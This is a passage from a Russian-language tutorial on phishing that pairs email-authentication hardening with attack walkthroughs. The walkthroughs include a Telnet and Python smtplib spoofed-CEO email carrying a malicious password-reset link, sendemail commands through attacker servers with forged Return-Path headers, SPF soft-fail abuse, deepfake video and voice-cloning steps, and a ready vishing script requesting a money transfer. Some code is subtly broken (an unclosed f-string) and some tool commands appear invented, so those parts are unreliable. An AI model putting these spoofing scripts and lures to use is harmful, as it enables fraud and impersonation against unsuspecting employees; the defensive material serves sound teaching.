  &lt;/ul&gt;
  &lt;h3 id=&quot;DY2c&quot;&gt;&lt;strong&gt; 5. Мониторьте и анализируйте журналы&lt;/strong&gt;&lt;/h3&gt;
  &lt;p id=&quot;vTI2&quot;&gt;Почтовые серверы и системы безопасности генерируют журналы, которые могут выявлять подозрительную активность, такую как письма, не прошедшие проверки SPF, DKIM или DMARC. Регулярно просматривайте эти журналы на предмет попыток подделки.&lt;/p&gt;
  &lt;p id=&quot;udQW&quot;&gt;Например, на почтовых серверах Postfix проверьте журнал на наличие отклоненных писем:&lt;/p&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;Hb0t&quot;&gt;grep &amp;quot;reject&amp;quot; /var/log/mail.log&lt;/pre&gt;
  &lt;p id=&quot;gQ4A&quot;&gt;&lt;em&gt;Это покажет письма, которые были заблокированы из-за несоответствия SPF, DKIM или DMARC.&lt;/em&gt;&lt;/p&gt;
  &lt;p id=&quot;tjnz&quot;&gt;&lt;strong&gt;Пример команды для применения SPF, DKIM и DMARC на сервере Postfix:&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;sGa9&quot;&gt;&lt;strong&gt;1. Принудительная проверка SPF в Postfix:&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;LMaq&quot;&gt;
    &lt;li id=&quot;GaB4&quot;&gt;Добавьте следующее в файл /etc/postfix/main.cf:&lt;/li&gt;
  &lt;/ul&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;vYQK&quot;&gt;smtpd_recipient_restrictions =
    reject_unauth_destination
    check_policy_service unix:private/policyd-spf&lt;/pre&gt;
  &lt;p id=&quot;5l4Y&quot;&gt;&lt;strong&gt;2. Установка и настройка DKIM с OpenDKIM:&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;RTSc&quot;&gt;
    &lt;li id=&quot;bhFi&quot;&gt;Установите OpenDKIM:&lt;/li&gt;
  &lt;/ul&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;Tf8b&quot;&gt;sudo apt-get install opendkim opendkim-tools&lt;/pre&gt;
  &lt;ul id=&quot;iNXV&quot;&gt;
    &lt;li id=&quot;78Vc&quot;&gt;Настройте Postfix для использования OpenDKIM, отредактировав &lt;em&gt;/etc/postfix/main.cf&lt;/em&gt;:&lt;/li&gt;
  &lt;/ul&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;aOVu&quot;&gt;milter_default_action = accept
milter_protocol = 2
smtpd_milters = unix:/opendkim/opendkim.sock
non_smtpd_milters = unix:/opendkim/opendkim.sock&lt;/pre&gt;
  &lt;p id=&quot;hIKM&quot;&gt;&lt;strong&gt;3. Включение DMARC в Postfix:&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;WXhZ&quot;&gt;Установите и настройте службу политики DMARC, такую как &lt;strong&gt;OpenDMARC&lt;/strong&gt;, и настройте её в Postfix аналогично OpenDKIM.&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;9X99&quot; data-align=&quot;center&quot;&gt;4. Обход SPF&lt;/h2&gt;
  &lt;/section&gt;
  &lt;p id=&quot;qPbq&quot;&gt;&lt;strong&gt;SPF (Sender Policy Framework)&lt;/strong&gt; — это механизм аутентификации электронной почты, который помогает предотвратить отправку спам-сообщений от имени вашего домена. SPF работает, позволяя владельцам доменов указывать, какие почтовые серверы имеют право отправлять письма от имени их домена. Когда почтовый сервер получает сообщение, он проверяет SPF-запись отправляющего домена, чтобы убедиться, что IP-адрес отправителя имеет право отправлять письма от имени этого домена. Если проверка SPF не проходит, сервер может пометить сообщение как спам или отклонить его.&lt;/p&gt;
  &lt;p id=&quot;yTsd&quot;&gt;&lt;strong&gt;1. Создание записи в DNS: &lt;/strong&gt;Владелец домена публикует SPF-запись в DNS (системе доменных имен). Эта запись перечисляет все авторизованные почтовые серверы для домена.&lt;/p&gt;
  &lt;p id=&quot;AtMt&quot;&gt;&lt;strong&gt;Пример SPF-записи:&lt;/strong&gt;&lt;/p&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;HSbQ&quot;&gt;v=spf1 ip4:192.168.1.1 include:example.com -all&lt;/pre&gt;
  &lt;ul id=&quot;I6uN&quot;&gt;
    &lt;li id=&quot;1cfM&quot;&gt;Эта запись разрешает IP-адресу 192.168.1.1 и домену example.com отправлять письма от имени указанного домена. &amp;quot;-all&amp;quot; указывает, что любые другие IP-адреса должны не проходить проверку SPF.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;MJny&quot;&gt;&lt;strong&gt;2. Проверка получающим сервером: &lt;/strong&gt;Когда получатель получает электронное письмо, сервер проверяет записи DNS отправляющего домена. Если IP-адрес сервера-отправителя совпадает с авторизованным списком, проверка SPF проходит.&lt;/p&gt;
  &lt;p id=&quot;EkIV&quot;&gt;Несмотря на наличие SPF-защиты, &lt;strong&gt;подмена почты остаётся проблемой&lt;/strong&gt;, особенно если домены не применяют SPF или серверы-получатели не настроены на отклонение писем, не прошедших проверку SPF.&lt;/p&gt;
  &lt;p id=&quot;1rN4&quot;&gt;Подмена почты включает отправку электронного письма, которое кажется отправленным с чужого домена или адреса электронной почты. Это часто используется для фишинговых атак или атак социальной инженерии. Хотя SPF может предотвратить доставку фишинговых писем, мы можем попытаться обойти SPF на плохо настроенных системах или нацелиться на системы, где отсутствуют соответствующие протоколы аутентификации почты.&lt;/p&gt;
  &lt;h3 id=&quot;0L1Z&quot;&gt;&lt;strong&gt;Инструменты для подмены почты&lt;/strong&gt;&lt;/h3&gt;
  &lt;p id=&quot;lbVL&quot;&gt;Вот упрощённое руководство по отправке поддельного письма с использованием Telnet или инструментов, таких как &lt;strong&gt;Sendmail&lt;/strong&gt; или &lt;strong&gt;библиотеки SMTP на Python&lt;/strong&gt;. Эти методы предназначены исключительно в образовательных целях)&lt;/p&gt;
  &lt;p id=&quot;v2sh&quot;&gt;Telnet можно использовать для прямого общения с SMTP-сервером и отправки электронных писем. Вот как это работает:&lt;/p&gt;
  &lt;p id=&quot;w64o&quot;&gt;&lt;strong&gt;Шаги:&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;V4Cl&quot;&gt;
    &lt;li id=&quot;GbZg&quot;&gt;Откройте терминал и подключитесь к почтовому серверу с помощью Telnet:&lt;/li&gt;
  &lt;/ul&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;C6kt&quot;&gt;telnet smtp.example.com 25&lt;/pre&gt;
  &lt;ul id=&quot;UI2M&quot;&gt;
    &lt;li id=&quot;MB5j&quot;&gt;Сервер ответит. Далее представьтесь серверу с помощью команды SMTP:&lt;/li&gt;
  &lt;/ul&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;JqiU&quot;&gt;HELO example.com&lt;/pre&gt;
  &lt;ul id=&quot;ddDC&quot;&gt;
    &lt;li id=&quot;qjtK&quot;&gt;Установите поддельный адрес отправителя:&lt;/li&gt;
  &lt;/ul&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;SgzS&quot;&gt;MAIL FROM: &amp;lt;fake@example.com&amp;gt;&lt;/pre&gt;
  &lt;ul id=&quot;0u2M&quot;&gt;
    &lt;li id=&quot;I3Mm&quot;&gt;Установите адрес получателя:&lt;/li&gt;
  &lt;/ul&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;rZJx&quot;&gt;RCPT TO: &amp;lt;victim@targetdomain.com&amp;gt;&lt;/pre&gt;
  &lt;ul id=&quot;VtAv&quot;&gt;
    &lt;li id=&quot;SrqX&quot;&gt;Начните составление сообщения:&lt;/li&gt;
  &lt;/ul&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;RixC&quot;&gt;DATA&lt;/pre&gt;
  &lt;ul id=&quot;H2hE&quot;&gt;
    &lt;li id=&quot;H5Nk&quot;&gt;Напишите тело письма и заголовки:&lt;/li&gt;
  &lt;/ul&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;HZmG&quot;&gt;Subject: Important Update
From: CEO &amp;lt;ceo@company.com&amp;gt;
To: victim@targetdomain.co
Hello,
This is a fake email. Please follow the instructions below...
.&lt;/pre&gt;
  &lt;ul id=&quot;rUwW&quot;&gt;
    &lt;li id=&quot;NiZS&quot;&gt;&lt;strong&gt;Завершите сообщение точкой (.) на новой строке:&lt;/strong&gt;&lt;/li&gt;
  &lt;/ul&gt;
  &lt;pre id=&quot;Wdkk&quot;&gt;.&lt;/pre&gt;
  &lt;ul id=&quot;5R8L&quot;&gt;
    &lt;li id=&quot;Wnff&quot;&gt;Завершите сессию:&lt;/li&gt;
  &lt;/ul&gt;
  &lt;pre id=&quot;Oocb&quot;&gt;QUIT&lt;/pre&gt;
  &lt;p id=&quot;GkeL&quot;&gt;Теперь фишинговое письмо будет отправлено получателю, возможно, обойдя слабые меры безопасности.&lt;/p&gt;
  &lt;h3 id=&quot;0KRU&quot;&gt;&lt;strong&gt;Использование Python для подмены почты&lt;/strong&gt;&lt;/h3&gt;
  &lt;blockquote id=&quot;iYAr&quot;&gt;Библиотека &lt;strong&gt;smtplib в Python&lt;/strong&gt; может быть использована для скриптовой отправки электронных писем, включая поддельные сообщения.&lt;/blockquote&gt;
  &lt;p id=&quot;bqle&quot;&gt;&lt;strong&gt;Пример на Python:&lt;/strong&gt;&lt;/p&gt;
  &lt;pre data-lang=&quot;python&quot; id=&quot;IYdn&quot;&gt;import smtplib

# Настройка сервера
server = smtplib.SMTP(&amp;#x27;smtp.example.com&amp;#x27;, 25)  # Замените на целевой SMTP-сервер и порт
server.ehlo()

# Составление письма
from_email = &amp;quot;ceo@company.com&amp;quot;  # Поддельный отправитель
to_email = &amp;quot;victim@targetdomain.com&amp;quot;
subject = &amp;quot;Urgent: Security Update&amp;quot;
message = f&amp;quot;&amp;quot;&amp;quot;\
From: CEO &amp;lt;ceo@company.com&amp;gt;
To: &amp;lt;victim@targetdomain.com&amp;gt;
Subject: {subject

Dear User,

Please reset your password immediately at the following link:
http://malicious-link.com

Sincerely,
CEO
&amp;quot;&amp;quot;&amp;quot;

# Отправка письма
server.sendmail(from_email, to_email, message)
server.quit()&lt;/pre&gt;
  &lt;h3 id=&quot;3CPD&quot;&gt;&lt;strong&gt; Как защититься от подмены почты&lt;/strong&gt;&lt;/h3&gt;
  &lt;p id=&quot;b6Ek&quot;&gt;Чтобы защититься от поддельных писем, организации должны внедрить и строго следовать следующим механизмам:&lt;/p&gt;
  &lt;ul id=&quot;ENXp&quot;&gt;
    &lt;li id=&quot;oilL&quot;&gt;&lt;strong&gt;SPF: &lt;/strong&gt;Убедитесь, что SPF-записи настроены правильно для вашего домена.&lt;/li&gt;
    &lt;li id=&quot;tAXs&quot;&gt;&lt;strong&gt;DKIM (DomainKeys Identified Mail):&lt;/strong&gt; Подписывайте исходящие письма цифровой подписью.&lt;/li&gt;
    &lt;li id=&quot;f9er&quot;&gt;&lt;strong&gt;DMARC (Domain-based Message Authentication, Reporting, and Conformance): &lt;/strong&gt;Применяйте политики, которые указывают серверам-получателям, как обрабатывать письма, не прошедшие проверку SPF или DKIM.&lt;/li&gt;
    &lt;li id=&quot;A8FB&quot;&gt;&lt;strong&gt;Фильтрация почты:&lt;/strong&gt; Используйте продвинутые фильтры для электронной почты, чтобы обнаруживать и блокировать подозрительные письма, даже если SPF и DKIM проверки пройдены.&lt;/li&gt;
    &lt;li id=&quot;qrbA&quot;&gt;&lt;strong&gt;Обучение сотрудников:&lt;/strong&gt; Обучайте сотрудников распознавать фишинговые письма и понимать риски подмены почты.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;SIKi&quot; data-align=&quot;center&quot;&gt;5. Несоответствие Return-Path&lt;/h2&gt;
  &lt;/section&gt;
  &lt;p id=&quot;VX8J&quot;&gt;Один из самых распространённых методов фишинга заключается в подделке адреса отправителя, чтобы электронное письмо выглядело как сообщение от доверенного источника. &lt;strong&gt;Быстрый способ выявить это — сравнить поле &amp;quot;От&amp;quot; с &amp;quot;Return-Path&amp;quot; в заголовке письма.&lt;/strong&gt; Атакующий подделывает поле &amp;quot;From&amp;quot;, но настоящий сервер, отправляющий письмо, может быть другим, что позволяет распознать атаку.&lt;/p&gt;
  &lt;p id=&quot;uBUh&quot;&gt;&lt;strong&gt;Шаги для проверки отправителя и Return-Path:&lt;/strong&gt;&lt;/p&gt;
  &lt;ol id=&quot;Bi2r&quot;&gt;
    &lt;li id=&quot;K4kL&quot;&gt;Откройте письмо&lt;/li&gt;
    &lt;li id=&quot;Xsil&quot;&gt;Нажмите на три точки (⋮) в правом верхнем углу письма и выберите &amp;quot;Показать оригинал&amp;quot; (например, в Gmail)&lt;/li&gt;
    &lt;li id=&quot;jOHI&quot;&gt;Проверьте поле &amp;quot;Sender&amp;quot; в теле письма и поле &amp;quot;Return-Path&amp;quot; в оригинальных заголовках&lt;/li&gt;
    &lt;li id=&quot;qmHx&quot;&gt;Если &amp;quot;Sender&amp;quot; (видимый в письме) и &amp;quot;Return-Path&amp;quot; (в исходных заголовках) не совпадают, это вероятный признак фишинговой атаки&lt;/li&gt;
  &lt;/ol&gt;
  &lt;h3 id=&quot;tquh&quot;&gt;&lt;strong&gt;Сценарий атаки — код для отправки поддельного письма с поддельным Return-Path:&lt;/strong&gt;&lt;/h3&gt;
  &lt;p id=&quot;1BOm&quot;&gt;Атакующий может использовать такие инструменты, как &lt;strong&gt;Sendmail &lt;/strong&gt;или &lt;strong&gt;SendEmail&lt;/strong&gt;, чтобы подделать адрес &amp;quot;&lt;strong&gt;From&lt;/strong&gt;&amp;quot;, задав при этом другой &amp;quot;&lt;strong&gt;Return-Path&lt;/strong&gt;&amp;quot;:&lt;/p&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;OYjJ&quot;&gt;sendemail -f attacker@fakecompany.com -t victim@legitcompany.com -u &amp;quot;Urgent: Payment Required&amp;quot; \
-m &amp;quot;Please process the payment today.&amp;quot; \
-s smtp.fakeserver.com:25 -o message-header=&amp;quot;Return-Path: &amp;lt;attackerserver@malicious.com&amp;gt;&amp;quot;&lt;/pre&gt;
  &lt;p id=&quot;ZSHY&quot;&gt;В этом примере атакующий устанавливает &lt;strong&gt;Return-Path&lt;/strong&gt; на другой сервер. При выборе &amp;quot;&lt;strong&gt;Показать оригинал&lt;/strong&gt;&amp;quot; получатель может обнаружить это несоответствие и распознать фальшивку.&lt;/p&gt;
  &lt;h3 id=&quot;cA0E&quot;&gt;Проверка IP-адреса почтового сервера&lt;/h3&gt;
  &lt;p id=&quot;hGup&quot;&gt;Злоумышленники часто используют скомпрометированные или неавторизованные почтовые серверы для отправки фишинговых писем. Проверка IP-адреса сервера, отправляющего письмо, может показать, является ли сервер доверенным. Инструменты, такие как MXToolbox, могут помочь определить, находится ли отправляющий IP-адрес в чёрном списке, что может сигнализировать о мошенничестве.&lt;/p&gt;
  &lt;p id=&quot;ZrZJ&quot;&gt;&lt;strong&gt;Шаги для проверки IP-адреса:&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;pJST&quot;&gt;1. Откройте исходник письма (например, &amp;quot;Показать оригинал&amp;quot; в Gmail).&lt;/p&gt;
  &lt;p id=&quot;CnM6&quot;&gt;2. Найдите IP-адрес сервера в заголовках &amp;quot;Received&amp;quot;. Например:&lt;/p&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;mBiV&quot;&gt;Received: from smtp.maliciousserver.com ([192.0.2.123])&lt;/pre&gt;
  &lt;p id=&quot;9Ezy&quot;&gt;3. Используйте MXToolbox или другой сервис для проверки, находится ли IP-адрес в чёрном списке:&lt;/p&gt;
  &lt;ul id=&quot;i4xr&quot;&gt;
    &lt;li id=&quot;gSj5&quot;&gt;Перейдите на MXToolbox и введите IP-адрес.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;VNOG&quot;&gt;4. Если IP-адрес в чёрном списке или подозрителен, письмо, скорее всего, является фишинговым&lt;/p&gt;
  &lt;h3 id=&quot;5IXN&quot;&gt;Сценарий атаки — отправка поддельного письма с пользовательским SMTP:&lt;/h3&gt;
  &lt;p id=&quot;xyOe&quot;&gt;Атакующий может использовать пользовательский SMTP-сервер для отправки поддельного письма:&lt;/p&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;Xd55&quot;&gt;sendemail -f ceo@legitcompany.com -t victim@target.com \
-u &amp;quot;Invoice Payment Required&amp;quot; -m &amp;quot;Please pay the invoice attached.&amp;quot; \
-s smtp.maliciousserver.com:25&lt;/pre&gt;
  &lt;p id=&quot;ZgoE&quot;&gt;IP-адрес &lt;code&gt;smtp.maliciousserver.com&lt;/code&gt; можно проверить на наличие в чёрном списке, чтобы выявить его злонамеренные намерения.&lt;/p&gt;
  &lt;p id=&quot;AdgB&quot;&gt;Если проверка&lt;strong&gt; SPF&lt;/strong&gt; или &lt;strong&gt;DMARC &lt;/strong&gt;не пройдена, письмо может быть подделано.&lt;/p&gt;
  &lt;h3 id=&quot;Yr2H&quot;&gt;Сценарий атаки — обход SPF и отправка фишинговых писем:&lt;/h3&gt;
  &lt;p id=&quot;cTuU&quot;&gt;SPF может быть обойдён, если запись SPF целевого домена настроена неправильно, например, при использовании мягкого отказа (&lt;code&gt;~all&lt;/code&gt;) вместо жёсткого отказа (&lt;code&gt;-all&lt;/code&gt;). Вот как может действовать злоумышленник:&lt;/p&gt;
  &lt;p id=&quot;hXXE&quot;&gt;&lt;strong&gt;Запись SPF домена:&lt;/strong&gt;&lt;/p&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;nAUO&quot;&gt;v=spf1 ip4:192.0.2.1 ~all&lt;/pre&gt;
  &lt;p id=&quot;8E8k&quot;&gt;Мягкий отказ (&lt;code&gt;~all&lt;/code&gt;) означает, что неавторизованные серверы будут отмечены, но не отклонены.&lt;/p&gt;
  &lt;p id=&quot;8KNZ&quot;&gt;&lt;strong&gt;Отправка поддельного письма с неавторизованного сервера:&lt;/strong&gt;&lt;/p&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;v1oC&quot;&gt;sendemail -f finance@legitcompany.com -t victim@targetdomain.com \
-u &amp;quot;Payment Information&amp;quot; -m &amp;quot;Please complete the attached invoice.&amp;quot; \
-s smtp.attacker.com:25&lt;/pre&gt;
  &lt;p id=&quot;nCSV&quot;&gt;Поскольку SPF настроен на мягкий отказ, письмо может быть доставлено, даже если оно отправлено с неавторизованного сервера.&lt;/p&gt;
  &lt;p id=&quot;Rjkq&quot;&gt;&lt;strong&gt;Методы предотвращения:&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;p2K8&quot;&gt;Чтобы защитить вашу почтовую систему от фишинговых атак, важно внедрить и соблюдать лучшие практики безопасности, такие как SPF, DKIM и DMARC, с правильными настройками.&lt;/p&gt;
  &lt;p id=&quot;iCqt&quot;&gt;&lt;strong&gt; Настройка SPF-записи:&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;Sdkm&quot;&gt;Убедитесь, что ваша SPF-запись чётко определяет, какие серверы могут отправлять письма от имени вашего домена:&lt;/p&gt;
  &lt;p id=&quot;j6yN&quot;&gt;1. Отредактируйте DNS для добавления записи SPF:&lt;/p&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;Lqo9&quot;&gt;example.com. IN TXT &amp;quot;v=spf1 ip4:192.0.2.1 -all&amp;quot;&lt;/pre&gt;
  &lt;p id=&quot;xDvr&quot;&gt;2. Проверьте вашу запись SPF:&lt;/p&gt;
  &lt;ul id=&quot;AleH&quot;&gt;
    &lt;li id=&quot;ZYSJ&quot;&gt;Используйте инструмент, такой как &lt;strong&gt;MXToolbox:&lt;/strong&gt;&lt;/li&gt;
  &lt;/ul&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;xpFp&quot;&gt;dig txt example.com&lt;/pre&gt;
  &lt;p id=&quot;A50W&quot;&gt;&lt;strong&gt; Настройка DKIM:&lt;/strong&gt;&lt;br /&gt;1. Сгенерируйте ключ DKIM:&lt;/p&gt;
  &lt;ul id=&quot;qUfo&quot;&gt;
    &lt;li id=&quot;aLyT&quot;&gt;Используйте такие инструменты, как &lt;strong&gt;opendkim&lt;/strong&gt;, для генерации публичных и частных ключей&lt;/li&gt;
  &lt;/ul&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;by8Y&quot;&gt;opendkim-genkey -s default -d example.com&lt;/pre&gt;
  &lt;p id=&quot;V19O&quot;&gt;2. Добавьте публичный ключ в DNS:&lt;/p&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;AWtC&quot;&gt;default._domainkey.example.com. IN TXT &amp;quot;v=DKIM1; k=rsa; p=MIGf...your_public_key...&amp;quot;&lt;/pre&gt;
  &lt;p id=&quot;DrEU&quot;&gt;3. Настройте ваш почтовый сервер для подписывания исходящих писем с использованием DKIM.&lt;/p&gt;
  &lt;p id=&quot;nLKp&quot;&gt;&lt;strong&gt;Настройка DMARC:&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;BawS&quot;&gt;1. Добавьте политику DMARC в DNS:&lt;/p&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;e0Fm&quot;&gt;_dmarc.example.com. IN TXT &amp;quot;v=DMARC1; p=reject; rua=mailto:dmarc-reports@example.com&amp;quot;&lt;/pre&gt;
  &lt;p id=&quot;wju0&quot;&gt;2. Проверьте DMARC:&lt;/p&gt;
  &lt;ul id=&quot;EFs3&quot;&gt;
    &lt;li id=&quot;HpEm&quot;&gt;Используйте MXToolbox, чтобы убедиться, что ваша конфигурация DMARC активна:&lt;/li&gt;
  &lt;/ul&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;JXtP&quot;&gt;dig txt _dmarc.example.com&lt;/pre&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;N0fy&quot; data-align=&quot;center&quot;&gt;6. Дипфейки и вишинг&lt;/h2&gt;
  &lt;/section&gt;
  &lt;p id=&quot;GUbk&quot;&gt;Фишинг значительно эволюционировал, внедрив сложные технологии, такие как &lt;strong&gt;deepfake-видео&lt;/strong&gt; и &lt;strong&gt;синтезированные ИИ голоса&lt;/strong&gt;, чтобы обманывать и манипулировать жертвами. Эти новые методы делают фишинговые атаки более убедительными, так как злоумышленники могут подражать доверенным лицам как в визуальном, так и в аудиоформатах. Это добавляет новый уровень сложности к традиционным методам фишинга и требует более продвинутых мер защиты.&lt;/p&gt;
  &lt;h3 id=&quot;3q5D&quot;&gt;1. Фишинг с использованием deepfake-видео&lt;/h3&gt;
  &lt;blockquote id=&quot;snzd&quot;&gt;Deepfake-фишинг включает использование ИИ-сгенерированных видео для имитации доверенных лиц, таких как руководители компаний или публичные фигуры. Атакующие могут использовать deepfake в фишинговых кампаниях, чтобы заставить сотрудников или людей выполнить действия, такие как перевод денег, раскрытие конфиденциальной информации или переход по вредоносным ссылкам.&lt;/blockquote&gt;
  &lt;p id=&quot;yNAf&quot;&gt;&lt;strong&gt;Сценарий атаки с использованием deepfake-видео&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;WSAX&quot;&gt;Хакеры используют ИИ-инструменты, такие как &lt;strong&gt;DeepFaceLab&lt;/strong&gt; или &lt;strong&gt;FaceSwap&lt;/strong&gt;, чтобы создать видео, где они подражают высокопоставленному руководителю или доверенному лицу. Затем они могут отправить фишинговое письмо или сообщение с встраиванием этого видео, призывая жертву к срочным действиям.&lt;/p&gt;
  &lt;p id=&quot;Xk89&quot;&gt;&lt;strong&gt;Пример создания deepfake-видео с использованием DeepFaceLab:&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;aTDK&quot;&gt;
    &lt;li id=&quot;Croe&quot;&gt;Установите &lt;strong&gt;DeepFaceLab&lt;/strong&gt; и загрузите предобученные модели:&lt;/li&gt;
  &lt;/ul&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;lk8M&quot;&gt;git clone https://github.com/iperov/DeepFaceLab.git
cd DeepFaceLab&lt;/pre&gt;
  &lt;ul id=&quot;OErS&quot;&gt;
    &lt;li id=&quot;44nb&quot;&gt;Соберите видео данных для подражания (исходное видео) и видео актёра (целевая видеозапись)&lt;/li&gt;
    &lt;li id=&quot;qQnw&quot;&gt;Извлеките лица из исходного видео:&lt;/li&gt;
  &lt;/ul&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;eI81&quot;&gt;python main.py extract --input-dir path/to/source_video --output-dir path/to/faces&lt;/pre&gt;
  &lt;ul id=&quot;hnRb&quot;&gt;
    &lt;li id=&quot;UFqR&quot;&gt;Обучите модель для создания deepfake:&lt;/li&gt;
  &lt;/ul&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;p24p&quot;&gt;python main.py train --data-dir path/to/dataset&lt;/pre&gt;
  &lt;ul id=&quot;fEaD&quot;&gt;
    &lt;li id=&quot;cRD1&quot;&gt;Сгенерируйте deepfake-видео:&lt;/li&gt;
  &lt;/ul&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;cGnJ&quot;&gt;python main.py merge --input-dir path/to/trained_model --output-dir path/to/output_video&lt;/pre&gt;
  &lt;h3 id=&quot;tecK&quot;&gt;Фишинг с использованием ИИ-сгенерированного голоса&lt;/h3&gt;
  &lt;blockquote id=&quot;PNiD&quot;&gt;ИИ-сгенерированные поддельные голоса, известные как&lt;strong&gt; голосовые deepfake или vishing (voice phishing)&lt;/strong&gt;, могут использоваться для имитации доверенных лиц по телефону или в голосовых сообщениях. Злоумышленники могут синтезировать голос человека, используя алгоритмы машинного обучения, делая фишинговые атаки более убедительными.&lt;/blockquote&gt;
  &lt;p id=&quot;Uq1s&quot;&gt;&lt;strong&gt;Сценарий атаки с использованием поддельного голоса&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;mMFL&quot;&gt;Инструменты, такие как &lt;strong&gt;Descript&lt;/strong&gt; или &lt;strong&gt;Lyrebird&lt;/strong&gt;, могут быть использованы для создания голосового deepfake после тренировки ИИ на примере голоса цели.&lt;/p&gt;
  &lt;p id=&quot;FGYX&quot;&gt;&lt;strong&gt;Пример процесса с использованием Descript:&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;vr46&quot;&gt;
    &lt;li id=&quot;Jyg7&quot;&gt;Запишите или соберите пример голоса цели (например, из публичных выступлений, видео или подкастов).&lt;/li&gt;
    &lt;li id=&quot;meva&quot;&gt;Обучите AI имитировать голос:&lt;/li&gt;
  &lt;/ul&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;3U5S&quot;&gt;descript clone --voice-sample path/to/voice_sample.wav --output voice_model&lt;/pre&gt;
  &lt;ul id=&quot;a57Z&quot;&gt;
    &lt;li id=&quot;qgaO&quot;&gt;Сгенерируйте голосовой клип с использованием клонированного голоса:&lt;/li&gt;
  &lt;/ul&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;avzt&quot;&gt;descript synthesize --model voice_model --text &amp;quot;Please approve this fund transfer by end of day.&amp;quot;&lt;/pre&gt;
  &lt;h3 id=&quot;WFIl&quot;&gt;&lt;strong&gt;Vishing атака:&lt;/strong&gt;&lt;/h3&gt;
  &lt;p id=&quot;lxOa&quot;&gt;Атакующий использует сгенерированный ИИ голос для звонков или отправки голосовых сообщений, выдавая себя за руководителя или менеджера. Например, злоумышленник может позвонить сотруднику и потребовать перевести деньги или предоставить конфиденциальные данные.&lt;/p&gt;
  &lt;p id=&quot;o4lX&quot;&gt;&lt;strong&gt;Пример сценария голосового сообщения:&lt;/strong&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;YEw9&quot;&gt;&amp;quot;Привет, это ваш генеральный директор. Я на срочной встрече и мне нужно, чтобы вы немедленно перевели $15,000 на этот счёт. Я скоро отправлю вам детали по электронной почте. Спасибо!&amp;quot;&lt;/blockquote&gt;
  &lt;p id=&quot;gVqZ&quot;&gt;&lt;strong&gt;Методы предотвращения фишинга с использованием поддельного голоса:&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;heLG&quot;&gt;
    &lt;li id=&quot;inI3&quot;&gt;&lt;strong&gt;Аутентификация по голосовым биометрическим данным: &lt;/strong&gt;Используйте инструменты для аутентификации по голосу, такие как &lt;strong&gt;Nuance&lt;/strong&gt; и &lt;strong&gt;Pindrop&lt;/strong&gt;, которые могут обнаруживать аномалии в голосовых паттернах.&lt;/li&gt;
    &lt;li id=&quot;twmF&quot;&gt;&lt;strong&gt;Протоколы обратного звонка:&lt;/strong&gt; Внедрите строгие политики обратного звонка, где сотрудники обязаны проверять любые финансовые или конфиденциальные запросы, перезванивая на известный и проверенный номер телефона.&lt;/li&gt;
    &lt;li id=&quot;dkhi&quot;&gt;&lt;strong&gt;Анализ голоса с помощью ИИ в реальном времени&lt;/strong&gt;: Продвинутые ИИ-инструменты могут анализировать входящие звонки в реальном времени, чтобы определить, является ли голос синтетическим или сгенерированным, помогая выявить подозрительные звонки.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;997i&quot; data-align=&quot;center&quot;&gt;7. Обход 2FA&lt;/h2&gt;
  &lt;/section&gt;
